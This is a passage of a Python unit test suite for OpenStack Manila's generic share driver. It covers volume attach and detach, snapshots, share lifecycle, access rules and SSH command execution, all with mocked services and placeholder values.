mock.Mock(return_value=mount_path)) self.mock_object(generic.LOG, 'warning') self._driver._unmount_device(self.share, self.server) self._driver._get_mount_path.assert_called_once_with(self.share) self._driver._is_device_mounted.assert_called_once_with( mount_path, self.server) generic.LOG.warning.assert_called_once_with(mock.ANY, mock.ANY) def test_is_device_mounted_true(self): volume = {'mountpoint': 'fake_mount_point', 'id': 'fake_id'} mount_path = '/fake/mount/path' mounts = "%(dev)s on %(path)s" % {'dev': volume['mountpoint'], 'path': mount_path} self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(mounts, 
            '')))
        result = self._driver._is_device_mounted(
            mount_path, self.server, volume)
        self._driver._ssh_exec.assert_called_once_with(
            self.server, ['sudo', 'mount'])
        self.assertEqual(result, True)

    def test_is_device_mounted_true_no_volume_provided(self):
        mount_path = '/fake/mount/path'
        mounts = "/fake/dev/path on %(path)s type fake" % {'path': mount_path}
        self.mock_object(self._driver, '_ssh_exec',
                         mock.Mock(return_value=(mounts, '')))
        result = self._driver._is_device_mounted(mount_path, self.server)
        self._driver._ssh_exec.assert_called_once_with(
            self.server, ['sudo', 'mount'])
        self.assertEqual(result, True)

    def test_is_device_mounted_false(self):
        mount_path = '/fake/mount/path'
        volume = {'mountpoint': 'fake_mount_point', 'id': 'fake_id'}
        mounts = "%(dev)s on %(path)s" % {'dev': '/fake', 'path': mount_path}
        self.mock_object(self._driver, '_ssh_exec',
                         mock.Mock(return_value=(mounts, '')))
        result = self._driver._is_device_mounted(
            mount_path, self.server, volume)
        self._driver._ssh_exec.assert_called_once_with(
            self.server, ['sudo', 'mount'])
        self.assertEqual(result, False)

    def test_is_device_mounted_false_no_volume_provided(self):
        mount_path = '/fake/mount/path'
        mounts = "%(path)s" % {'path': 'fake'}
        self.mock_object(self._driver, '_ssh_exec',
                         mock.Mock(return_value=(mounts, '')))
        self.mock_object(self._driver, '_get_mount_path',
                         mock.Mock(return_value=mount_path))
        result = self._driver._is_device_mounted(mount_path, self.server)
        self._driver._ssh_exec.assert_called_once_with(
            self.server, ['sudo', 'mount'])
        self.assertEqual(result, False)

    def test_sync_mount_temp_and_perm_files(self):
        self.mock_object(self._driver, '_ssh_exec')
        self._driver._sync_mount_temp_and_perm_files(self.server)
        # Use assert_has_calls: plain has_calls is not an assertion and would
        # silently pass even if neither command had been issued.
        self._driver._ssh_exec.assert_has_calls([
            mock.call(
                self.server,
                ['sudo', 'cp', const.MOUNT_FILE_TEMP, const.MOUNT_FILE]),
            mock.call(self.server, ['sudo', 'mount', '-a'])])

    def test_sync_mount_temp_and_perm_files_raise_error_on_copy(self):
        self.mock_object(
            self._driver, '_ssh_exec',
            mock.Mock(side_effect=exception.ProcessExecutionError))
        self.assertRaises(
            exception.ShareBackendException,
            self._driver._sync_mount_temp_and_perm_files,
            self.server
        )
        self._driver._ssh_exec.assert_called_once_with(
            self.server,
            ['sudo', 'cp', const.MOUNT_FILE_TEMP, const.MOUNT_FILE])

    def test_sync_mount_temp_and_perm_files_raise_error_on_mount(self):
        def raise_error_on_mount(*args, **kwargs):
            # Let the 'cp' call succeed and fail only on 'mount -a', so this
            # test exercises the mount-failure path its name implies.
            if args[1][1] == 'mount':
                raise exception.ProcessExecutionError()

        self.mock_object(self._driver, '_ssh_exec',
                         mock.Mock(side_effect=raise_error_on_mount))
        self.assertRaises(
            exception.ShareBackendException,
            self._driver._sync_mount_temp_and_perm_files,
            self.server
        )
        self._driver._ssh_exec.assert_has_calls([
            mock.call(
                self.server,
                ['sudo', 'cp', const.MOUNT_FILE_TEMP, const.MOUNT_FILE]),
            mock.call(self.server, ['sudo', 'mount', '-a'])])

    def test_get_mount_path(self):
        result = self._driver._get_mount_path(self.share)
        self.assertEqual(result, os.path.join(CONF.share_mount_path,
                                              self.share['name']))

    def test_attach_volume_not_attached(self):
        available_volume = fake_volume.FakeVolume()
        attached_volume = fake_volume.FakeVolume(status='in-use')
        self.mock_object(self._driver.compute_api, 'instance_volume_attach')
        self.mock_object(self._driver.volume_api, 'get',
                         mock.Mock(return_value=attached_volume))
        result = self._driver._attach_volume(self._context, self.share,
                                             'fake_inst_id', available_volume)
        self._driver.compute_api.instance_volume_attach.\
            assert_called_once_with(self._context, 'fake_inst_id',
                                    available_volume['id'])
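        # After requesting the attach, the driver polls Cinder for the
        # volume's updated state; the assertions below verify that lookup
        # and that the refreshed volume object is returned.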
        self._driver.volume_api.get.assert_called_once_with(
            self._context, attached_volume['id'])
        self.assertEqual(result, attached_volume)

    def test_attach_volume_attached_correct(self):
        fake_server = fake_compute.FakeServer()
        attached_volume = fake_volume.FakeVolume(status='in-use')
        self.mock_object(self._driver.compute_api, 'instance_volumes_list',
                         mock.Mock(return_value=[attached_volume]))
        result = self._driver._attach_volume(self._context, self.share,
                                             fake_server, attached_volume)
        self.assertEqual(result, attached_volume)

    def test_attach_volume_attached_incorrect(self):
        fake_server = fake_compute.FakeServer()
        attached_volume = fake_volume.FakeVolume(status='in-use')
        another_volume = fake_volume.FakeVolume(id='fake_id2',
                                                status='in-use')
        self.mock_object(self._driver.compute_api, 'instance_volumes_list',
                         mock.Mock(return_value=[another_volume]))
        self.assertRaises(exception.ManilaException,
                          self._driver._attach_volume, self._context,
                          self.share, fake_server, attached_volume)

    @ddt.data(exception.ManilaException, exception.Invalid)
    def test_attach_volume_failed_attach(self, side_effect):
        fake_server = fake_compute.FakeServer()
        available_volume = fake_volume.FakeVolume()
        self.mock_object(self._driver.compute_api, 'instance_volume_attach',
                         mock.Mock(side_effect=side_effect))
        self.assertRaises(exception.ManilaException,
                          self._driver._attach_volume,
                          self._context, self.share, fake_server,
                          available_volume)
        self.assertEqual(
            3, self._driver.compute_api.instance_volume_attach.call_count)

    def test_attach_volume_attached_retry_correct(self):
        fake_server = fake_compute.FakeServer()
        attached_volume = fake_volume.FakeVolume(status='available')
        in_use_volume = fake_volume.FakeVolume(status='in-use')
        side_effect = [exception.Invalid("Fake"), attached_volume]
        attach_mock = mock.Mock(side_effect=side_effect)
        self.mock_object(self._driver.compute_api, 'instance_volume_attach',
                         attach_mock)
        self.mock_object(self._driver.compute_api, 'instance_volumes_list',
                         mock.Mock(return_value=[attached_volume]))
        self.mock_object(self._driver.volume_api, 'get',
                         mock.Mock(return_value=in_use_volume))
        result = self._driver._attach_volume(self._context, self.share,
                                             fake_server, attached_volume)
        self.assertEqual(result, in_use_volume)
        self.assertEqual(
            2, self._driver.compute_api.instance_volume_attach.call_count)

    def test_attach_volume_error(self):
        fake_server = fake_compute.FakeServer()
        available_volume = fake_volume.FakeVolume()
        error_volume = fake_volume.FakeVolume(status='error')
        self.mock_object(self._driver.compute_api, 'instance_volume_attach')
        self.mock_object(self._driver.volume_api, 'get',
                         mock.Mock(return_value=error_volume))
        self.assertRaises(exception.ManilaException,
                          self._driver._attach_volume,
                          self._context, self.share,
                          fake_server, available_volume)

    def test_get_volume(self):
        volume = fake_volume.FakeVolume(
            name=CONF.volume_name_template % self.share['id'])
        self.mock_object(self._driver.volume_api, 'get_all',
                         mock.Mock(return_value=[volume]))
        result = self._driver._get_volume(self._context, self.share['id'])
        self.assertEqual(result, volume)
        self._driver.volume_api.get_all.assert_called_once_with(
            self._context, {'all_tenants': True, 'name': volume['name']})

    def test_get_volume_with_private_data(self):
        volume = fake_volume.FakeVolume()
        self.mock_object(self._driver.volume_api, 'get',
                         mock.Mock(return_value=volume))
        self.mock_object(self.fake_private_storage, 'get',
                         mock.Mock(return_value=volume['id']))
        result = self._driver._get_volume(self._context, self.share['id'])
        self.assertEqual(result, volume)
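        # With a volume id recorded in private storage, _get_volume should
        # fetch the volume directly by id rather than listing all volumes;
        # both the Cinder call and the private-storage read are checked below.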
self._driver.volume_api.get.assert_called_once_with( self._context, volume['id']) self.fake_private_storage.get.assert_called_once_with( self.share['id'], 'volume_id' ) def test_get_volume_none(self): vol_name = ( self._driver.configuration.volume_name_template % self.share['id']) self.mock_object(self._driver.volume_api, 'get_all', mock.Mock(return_value=[])) result = self._driver._get_volume(self._context, self.share['id']) self.assertIsNone(result) self._driver.volume_api.get_all.assert_called_once_with( self._context, {'all_tenants': True, 'name': vol_name}) def test_get_volume_error(self): volume = fake_volume.FakeVolume( name=CONF.volume_name_template % self.share['id']) self.mock_object(self._driver.volume_api, 'get_all', mock.Mock(return_value=[volume, volume])) self.assertRaises(exception.ManilaException, self._driver._get_volume, self._context, self.share['id']) self._driver.volume_api.get_all.assert_called_once_with( self._context, {'all_tenants': True, 'name': volume['name']}) def test_get_volume_snapshot(self): volume_snapshot = fake_volume.FakeVolumeSnapshot( name=self._driver.configuration.volume_snapshot_name_template % self.snapshot['id']) self.mock_object(self._driver.volume_api, 'get_all_snapshots', mock.Mock(return_value=[volume_snapshot])) result = self._driver._get_volume_snapshot(self._context, self.snapshot['id']) self.assertEqual(result, volume_snapshot) self._driver.volume_api.get_all_snapshots.assert_called_once_with( self._context, {'name': volume_snapshot['name']}) def test_get_volume_snapshot_with_private_data(self): volume_snapshot = fake_volume.FakeVolumeSnapshot() self.mock_object(self._driver.volume_api, 'get_snapshot', mock.Mock(return_value=volume_snapshot)) self.mock_object(self.fake_private_storage, 'get', mock.Mock(return_value=volume_snapshot['id'])) result = self._driver._get_volume_snapshot(self._context, self.snapshot['id']) self.assertEqual(result, volume_snapshot) self._driver.volume_api.get_snapshot.assert_called_once_with( self._context, volume_snapshot['id']) self.fake_private_storage.get.assert_called_once_with( self.snapshot['id'], 'volume_snapshot_id' ) def test_get_volume_snapshot_none(self): snap_name = ( self._driver.configuration.volume_snapshot_name_template % self.share['id']) self.mock_object(self._driver.volume_api, 'get_all_snapshots', mock.Mock(return_value=[])) result = self._driver._get_volume_snapshot(self._context, self.share['id']) self.assertIsNone(result) self._driver.volume_api.get_all_snapshots.assert_called_once_with( self._context, {'name': snap_name}) def test_get_volume_snapshot_error(self): volume_snapshot = fake_volume.FakeVolumeSnapshot( name=self._driver.configuration.volume_snapshot_name_template % self.snapshot['id']) self.mock_object( self._driver.volume_api, 'get_all_snapshots', mock.Mock(return_value=[volume_snapshot, volume_snapshot])) self.assertRaises( exception.ManilaException, self._driver._get_volume_snapshot, self._context, self.snapshot['id']) self._driver.volume_api.get_all_snapshots.assert_called_once_with( self._context, {'name': volume_snapshot['name']}) def test_detach_volume(self): available_volume = fake_volume.FakeVolume() attached_volume = fake_volume.FakeVolume(status='in-use') self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=attached_volume)) self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[attached_volume])) self.mock_object(self._driver.compute_api, 'instance_volume_detach') self.mock_object(self._driver.volume_api, 'get', 
mock.Mock(return_value=available_volume)) self._driver._detach_volume(self._context, self.share, self.server['backend_details']) self._driver.compute_api.instance_volume_detach.\ assert_called_once_with( self._context, self.server['backend_details']['instance_id'], available_volume['id']) self._driver.volume_api.get.assert_called_once_with( self._context, available_volume['id']) def test_detach_volume_detached(self): available_volume = fake_volume.FakeVolume() attached_volume = fake_volume.FakeVolume(status='in-use') self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=attached_volume)) self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[])) self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=available_volume)) self.mock_object(self._driver.compute_api, 'instance_volume_detach') self._driver._detach_volume(self._context, self.share, self.server['backend_details']) self.assertFalse(self._driver.volume_api.get.called) self.assertFalse( self._driver.compute_api.instance_volume_detach.called) def test_allocate_container(self): fake_vol = fake_volume.FakeVolume() self.fake_conf.cinder_volume_type = 'fake_volume_type' self.mock_object(self._driver.volume_api, 'create', mock.Mock(return_value=fake_vol)) result = self._driver._allocate_container(self._context, self.share) self.assertEqual(result, fake_vol) self._driver.volume_api.create.assert_called_once_with( self._context, self.share['size'], CONF.volume_name_template % self.share['id'], '', snapshot=None, volume_type='fake_volume_type', availability_zone=self.share['availability_zone']) def test_allocate_container_with_snaphot(self): fake_vol = fake_volume.FakeVolume() fake_vol_snap = fake_volume.FakeVolumeSnapshot() self.mock_object(self._driver, '_get_volume_snapshot', mock.Mock(return_value=fake_vol_snap)) self.mock_object(self._driver.volume_api, 'create', mock.Mock(return_value=fake_vol)) result = self._driver._allocate_container(self._context, self.share, self.snapshot) self.assertEqual(result, fake_vol) self._driver.volume_api.create.assert_called_once_with( self._context, self.share['size'], CONF.volume_name_template % self.share['id'], '', snapshot=fake_vol_snap, volume_type=None, availability_zone=self.share['availability_zone']) def test_allocate_container_error(self): fake_vol = fake_volume.FakeVolume(status='error') self.mock_object(self._driver.volume_api, 'create', mock.Mock(return_value=fake_vol)) self.assertRaises(exception.ManilaException, self._driver._allocate_container, self._context, self.share) def test_wait_for_available_volume(self): fake_volume = {'status': 'creating', 'id': 'fake'} fake_available_volume = {'status': 'available', 'id': 'fake'} self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=fake_available_volume)) actual_result = self._driver._wait_for_available_volume( fake_volume, 5, "error", "timeout") self.assertEqual(fake_available_volume, actual_result) self._driver.volume_api.get.assert_called_once_with( mock.ANY, fake_volume['id']) @mock.patch('time.sleep') def test_wait_for_available_volume_error_extending(self, mock_sleep): fake_volume = {'status': 'error_extending', 'id': 'fake'} self.assertRaises(exception.ManilaException, self._driver._wait_for_available_volume, fake_volume, 5, 'error', 'timeout') self.assertFalse(mock_sleep.called) @mock.patch('time.sleep') def test_wait_for_extending_volume(self, mock_sleep): initial_size = 1 expected_size = 2 mock_volume = fake_volume.FakeVolume(status='available', 
size=initial_size) mock_extending_vol = fake_volume.FakeVolume(status='extending', size=initial_size) mock_extended_vol = fake_volume.FakeVolume(status='available', size=expected_size) self.mock_object(self._driver.volume_api, 'get', mock.Mock(side_effect=[mock_extending_vol, mock_extended_vol])) result = self._driver._wait_for_available_volume( mock_volume, 5, "error", "timeout", expected_size=expected_size) expected_get_count = 2 self.assertEqual(mock_extended_vol, result) self._driver.volume_api.get.assert_has_calls( [mock.call(self._driver.admin_context, mock_volume['id'])] * expected_get_count) mock_sleep.assert_has_calls([mock.call(1)] * expected_get_count) @ddt.data(mock.Mock(return_value={'status': 'creating', 'id': 'fake'}), mock.Mock(return_value={'status': 'error', 'id': 'fake'})) def test_wait_for_available_volume_invalid(self, volume_get_mock): fake_volume = {'status': 'creating', 'id': 'fake'} self.mock_object(self._driver.volume_api, 'get', volume_get_mock) self.mock_object(time, 'time', mock.Mock(side_effect=[1.0, 1.33, 1.67, 2.0])) self.assertRaises( exception.ManilaException, self._driver._wait_for_available_volume, fake_volume, 1, "error", "timeout" ) def test_deallocate_container(self): fake_vol = fake_volume.FakeVolume() self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=fake_vol)) self.mock_object(self._driver.volume_api, 'delete') self.mock_object(self._driver.volume_api, 'get', mock.Mock( side_effect=exception.VolumeNotFound(volume_id=fake_vol['id']))) self._driver._deallocate_container(self._context, self.share) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self._driver.volume_api.delete.assert_called_once_with( self._context, fake_vol['id']) self._driver.volume_api.get.assert_called_once_with( self._context, fake_vol['id']) def test_deallocate_container_with_volume_not_found(self): fake_vol = fake_volume.FakeVolume() self.mock_object(self._driver, '_get_volume', mock.Mock(side_effect=exception.VolumeNotFound( volume_id=fake_vol['id']))) self.mock_object(self._driver.volume_api, 'delete') self._driver._deallocate_container(self._context, self.share) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self.assertFalse(self._driver.volume_api.delete.called) def test_create_share_from_snapshot(self): vol1 = 'fake_vol1' vol2 = 'fake_vol2' self._helper_nfs.create_export.return_value = 'fakelocation' self.mock_object(self._driver, '_allocate_container', mock.Mock(return_value=vol1)) self.mock_object(self._driver, '_attach_volume', mock.Mock(return_value=vol2)) self.mock_object(self._driver, '_mount_device') result = self._driver.create_share_from_snapshot( self._context, self.share, self.snapshot, share_server=self.server) self.assertEqual(result, 'fakelocation') self._driver._allocate_container.assert_called_once_with( self._driver.admin_context, self.share, self.snapshot) self._driver._attach_volume.assert_called_once_with( self._driver.admin_context, self.share, self.server['backend_details']['instance_id'], vol1) self._driver._mount_device.assert_called_once_with( self.share, self.server['backend_details'], vol2) self._helper_nfs.create_export.assert_called_once_with( self.server['backend_details'], self.share['name']) def test_create_share_from_snapshot_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.create_share_from_snapshot, self._context, self.share, self.snapshot, share_server=self.server) def 
test_delete_share_no_share_servers_handling(self): self.mock_object(self._driver, '_deallocate_container') self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server)) self.mock_object( self._driver.service_instance_manager, 'ensure_service_instance', mock.Mock(return_value=False)) CONF.set_default('driver_handles_share_servers', False) self._driver.delete_share(self._context, self.share) self._driver.service_instance_manager.get_common_server.\ assert_called_once_with() self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) self._driver.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_delete_share(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') self._driver.delete_share( self._context, self.share, share_server=self.server) self._helper_nfs.remove_export.assert_called_once_with( self.server['backend_details'], self.share['name']) self._driver._unmount_device.assert_called_once_with( self.share, self.server['backend_details']) self._driver._detach_volume.assert_called_once_with( self._driver.admin_context, self.share, self.server['backend_details']) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) self._driver.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_delete_share_without_share_server(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') self._driver.delete_share( self._context, self.share, share_server=None) self.assertFalse(self._helper_nfs.remove_export.called) self.assertFalse(self._driver._unmount_device.called) self.assertFalse(self._driver._detach_volume.called) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) def test_delete_share_without_server_backend_details(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') fake_share_server = { 'instance_id': 'fake_instance_id', 'ip': 'fake_ip', 'username': 'fake_username', 'password': 'fake_password', 'pk_path': 'fake_pk_path', 'backend_details': {} } self._driver.delete_share( self._context, self.share, share_server=fake_share_server) self.assertFalse(self._helper_nfs.remove_export.called) self.assertFalse(self._driver._unmount_device.called) self.assertFalse(self._driver._detach_volume.called) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) def test_delete_share_without_server_availability(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') self.mock_object( self._driver.service_instance_manager, 'ensure_service_instance', mock.Mock(return_value=False)) self._driver.delete_share( self._context, self.share, share_server=self.server) self.assertFalse(self._helper_nfs.remove_export.called) self.assertFalse(self._driver._unmount_device.called) self.assertFalse(self._driver._detach_volume.called) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) 
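        # Even when the service instance is unavailable, the driver must have
        # asked for it before skipping the export cleanup; that check is
        # verified below.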
self._driver.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_delete_share_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.delete_share, self._context, self.share, share_server=self.server) def test_create_snapshot(self): fake_vol = fake_volume.FakeVolume() fake_vol_snap = fake_volume.FakeVolumeSnapshot(share_id=fake_vol['id']) self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=fake_vol)) self.mock_object(self._driver.volume_api, 'create_snapshot_force', mock.Mock(return_value=fake_vol_snap)) self._driver.create_snapshot(self._context, fake_vol_snap, share_server=self.server) self._driver._get_volume.assert_called_once_with( self._driver.admin_context, fake_vol_snap['share_id']) self._driver.volume_api.create_snapshot_force.assert_called_once_with( self._context, fake_vol['id'], CONF.volume_snapshot_name_template % fake_vol_snap['id'], '' ) def test_delete_snapshot(self): fake_vol_snap = fake_volume.FakeVolumeSnapshot() fake_vol_snap2 = {'id': 'fake_vol_snap2'} self.mock_object(self._driver, '_get_volume_snapshot', mock.Mock(return_value=fake_vol_snap2)) self.mock_object(self._driver.volume_api, 'delete_snapshot') self.mock_object( self._driver.volume_api, 'get_snapshot', mock.Mock(side_effect=exception.VolumeSnapshotNotFound( snapshot_id=fake_vol_snap['id']))) self._driver.delete_snapshot(self._context, fake_vol_snap, share_server=self.server) self._driver._get_volume_snapshot.assert_called_once_with( self._driver.admin_context, fake_vol_snap['id']) self._driver.volume_api.delete_snapshot.assert_called_once_with( self._driver.admin_context, fake_vol_snap2['id']) self._driver.volume_api.get_snapshot.assert_called_once_with( self._driver.admin_context, fake_vol_snap2['id']) def test_ensure_share(self): vol1 = 'fake_vol1' vol2 = 'fake_vol2' self._helper_nfs.create_export.return_value = 'fakelocation' self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=vol1)) self.mock_object(self._driver, '_attach_volume', mock.Mock(return_value=vol2)) self.mock_object(self._driver, '_mount_device') self._driver.ensure_share( self._context, self.share, share_server=self.server) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self._driver._attach_volume.assert_called_once_with( self._context, self.share, self.server['backend_details']['instance_id'], vol1) self._driver._mount_device.assert_called_once_with( self.share, self.server['backend_details'], vol2) self._helper_nfs.create_export.assert_called_once_with( self.server['backend_details'], self.share['name'], recreate=True) def test_ensure_share_volume_is_absent(self): self.mock_object( self._driver, '_get_volume', mock.Mock(return_value=None)) self.mock_object(self._driver, '_attach_volume') self._driver.ensure_share( self._context, self.share, share_server=self.server) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self.assertFalse(self._driver._attach_volume.called) def test_ensure_share_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.ensure_share, self._context, self.share, share_server=self.server) @ddt.data(const.ACCESS_LEVEL_RW, const.ACCESS_LEVEL_RO) def test_allow_access(self, access_level): access = { 'access_type': 'ip', 'access_to': 'fake_dest', 'access_level': access_level, } 
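        # allow_access is expected to delegate straight to the protocol
        # helper, passing the server backend details and the unpacked rule
        # fields.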
self._driver.allow_access( self._context, self.share, access, share_server=self.server) self._driver._helpers[self.share['share_proto']].\ allow_access.assert_called_once_with( self.server['backend_details'], self.share['name'], access['access_type'], access['access_level'], access['access_to']) def test_allow_access_unsupported(self): access = { 'access_type': 'ip', 'access_to': 'fake_dest', 'access_level': 'fakefoobar', } self.assertRaises( exception.InvalidShareAccessLevel, self._driver.allow_access, self._context, self.share, access, share_server=self.server) def test_deny_access(self): access = 'fake_access' self._driver.deny_access( self._context, self.share, access, share_server=self.server) self._driver._helpers[ self.share['share_proto']].deny_access.assert_called_once_with( self.server['backend_details'], self.share['name'], access) @ddt.data(fake_share.fake_share(), fake_share.fake_share(share_proto='NFSBOGUS'), fake_share.fake_share(share_proto='CIFSBOGUS')) def test__get_helper_with_wrong_proto(self, share): self.assertRaises(exception.InvalidShare, self._driver._get_helper, share) def test__setup_server(self): sim = self._driver.instance_manager net_info = { 'server_id': 'fake', 'neutron_net_id': 'fake-net-id', 'neutron_subnet_id': 'fake-subnet-id', } self._driver.setup_server(net_info) sim.set_up_service_instance.assert_called_once_with( self._context, net_info) def test__setup_server_revert(self): def raise_exception(*args, **kwargs): raise exception.ServiceInstanceException net_info = {'server_id': 'fake', 'neutron_net_id': 'fake-net-id', 'neutron_subnet_id': 'fake-subnet-id'} self.mock_object(self._driver.service_instance_manager, 'set_up_service_instance', mock.Mock(side_effect=raise_exception)) self.assertRaises(exception.ServiceInstanceException, self._driver.setup_server, net_info) def test__teardown_server(self): server_details = { 'instance_id': 'fake_instance_id', 'subnet_id': 'fake_subnet_id', 'router_id': 'fake_router_id', } self._driver.teardown_server(server_details) self._driver.service_instance_manager.delete_service_instance.\ assert_called_once_with( self._driver.admin_context, server_details) def test_ssh_exec_connection_not_exist(self): ssh_output = 'fake_ssh_output' cmd = ['fake', 'command'] ssh = mock.Mock() ssh.get_transport = mock.Mock() ssh.get_transport().is_active = mock.Mock(return_value=True) ssh_pool = mock.Mock() ssh_pool.create = mock.Mock(return_value=ssh) self.mock_object(utils, 'SSHPool', mock.Mock(return_value=ssh_pool)) self.mock_object(processutils, 'ssh_execute', mock.Mock(return_value=ssh_output)) self._driver.ssh_connections = {} result = self._driver._ssh_exec(self.server, cmd) utils.SSHPool.assert_called_once_with( self.server['ip'], 22, None, self.server['username'], self.server['password'], self.server['pk_path'], max_size=1) ssh_pool.create.assert_called_once_with() processutils.ssh_execute.assert_called_once_with(ssh, 'fake command') ssh.get_transport().is_active.assert_called_once_with() self.assertEqual( self._driver.ssh_connections, {self.server['instance_id']: (ssh_pool, ssh)} ) self.assertEqual(ssh_output, result) def test_ssh_exec_connection_exist(self): ssh_output = 'fake_ssh_output' cmd = ['fake', 'command'] ssh = mock.Mock() ssh.get_transport = mock.Mock() ssh.get_transport().is_active = mock.Mock(side_effect=lambda: True) ssh_pool = mock.Mock() self.mock_object(processutils, 'ssh_execute', mock.Mock(return_value=ssh_output)) self._driver.ssh_connections = { self.server['instance_id']: (ssh_pool, ssh) } result = 
self._driver._ssh_exec(self.server, cmd) processutils.ssh_execute.assert_called_once_with(ssh, 'fake command') ssh.get_transport().is_active.assert_called_once_with() self.assertEqual( self._driver.ssh_connections, {self.server['instance_id']: (ssh_pool, ssh)} ) self.assertEqual(ssh_output, result) def test_ssh_exec_connection_recreation(self): ssh_output = 'fake_ssh_output' cmd = ['fake', 'command'] ssh = mock.Mock() ssh.get_transport = mock.Mock() ssh.get_transport().is_active = mock.Mock(side_effect=lambda: False) ssh_pool = mock.Mock() ssh_pool.create = mock.Mock(side_effect=lambda: ssh) ssh_pool.remove = mock.Mock() self.mock_object(processutils, 'ssh_execute', mock.Mock(return_value=ssh_output)) self._driver.ssh_connections = { self.server['instance_id']: (ssh_pool, ssh) } result = self._driver._ssh_exec(self.server, cmd) processutils.ssh_execute.assert_called_once_with(ssh, 'fake command') ssh.get_transport().is_active.assert_called_once_with() ssh_pool.create.assert_called_once_with() ssh_pool.remove.assert_called_once_with(ssh) self.assertEqual( self._driver.ssh_connections, {self.server['instance_id']: (ssh_pool, ssh)} ) self.assertEqual(ssh_output, result) def test_get_share_stats_refresh_false(self): self._driver._stats = {'fake_key': 'fake_value'} result = self._driver.get_share_stats(False) self.assertEqual(self._driver._stats, result) def test_get_share_stats_refresh_true(self): fake_stats = {'fake_key': 'fake_value'} self._driver._stats = fake_stats expected_keys = [ 'QoS_support', 'driver_version', 'share_backend_name', 'free_capacity_gb', 'total_capacity_gb', 'driver_handles_share_servers', 'reserved_percentage', 'vendor_name', 'storage_protocol', ] result = self._driver.get_share_stats(True) self.assertNotEqual(fake_stats, result) for key in expected_keys: self.assertIn(key, result) self.assertEqual(True, result['driver_handles_share_servers']) self.assertEqual('Open Source', result['vendor_name']) def _setup_manage_mocks(self, get_share_type_extra_specs='False', is_device_mounted=True, server_details=None): CONF.set_default('driver_handles_share_servers', False) self.mock_object(share_types, 'get_share_type_extra_specs', mock.Mock(return_value=get_share_type_extra_specs)) self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=is_device_mounted)) self.mock_object(self._driver, 'service_instance_manager') server = {'backend_details': server_details} self.mock_object(self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=server)) def test_manage_invalid_protocol(self): share = {'share_proto': 'fake_proto'} self._setup_manage_mocks() self.assertRaises(exception.InvalidShare, self._driver.manage_existing, share, {}) def test_manage_not_mounted_share(self): share = get_fake_manage_share() fake_path = '/foo/bar' self._setup_manage_mocks(is_device_mounted=False) self.mock_object( self._driver._helpers[share['share_proto']], 'get_share_path_by_export_location', mock.Mock(return_value=fake_path)) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, {}) self.assertEqual( 1, self._driver.service_instance_manager.get_common_server.call_count) self._driver._is_device_mounted.assert_called_once_with( fake_path, None) self._driver._helpers[share['share_proto']].\ get_share_path_by_export_location.assert_called_once_with( None, share['export_locations'][0]['path']) def test_manage_share_not_attached_to_cinder_volume_invalid_size(self): share = get_fake_manage_share() server_details = {} fake_path = 
'/foo/bar' self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=None)) error = exception.ManageInvalidShare(reason="fake") self.mock_object( self._driver, '_get_mounted_share_size', mock.Mock(side_effect=error)) self.mock_object( self._driver._helpers[share['share_proto']], 'get_share_path_by_export_location', mock.Mock(return_value=fake_path)) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, {}) self._driver._get_mounted_share_size.assert_called_once_with( fake_path, server_details) self._driver._helpers[share['share_proto']].\ get_share_path_by_export_location.assert_called_once_with( server_details, share['export_locations'][0]['path']) def test_manage_share_not_attached_to_cinder_volume(self): share = get_fake_manage_share() share_size = "fake" fake_path = '/foo/bar' fake_exports = ['foo', 'bar'] server_details = {} self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver, '_get_volume') self.mock_object(self._driver, '_get_mounted_share_size', mock.Mock(return_value=share_size)) self.mock_object( self._driver._helpers[share['share_proto']], 'get_share_path_by_export_location', mock.Mock(return_value=fake_path)) self.mock_object( self._driver._helpers[share['share_proto']], 'get_exports_for_share', mock.Mock(return_value=fake_exports)) result = self._driver.manage_existing(share, {}) self.assertEqual( {'size': share_size, 'export_locations': fake_exports}, result) self._driver._helpers[share['share_proto']].get_exports_for_share.\ assert_called_once_with( server_details, share['export_locations'][0]['path']) self._driver._helpers[share['share_proto']].\ get_share_path_by_export_location.assert_called_once_with( server_details, 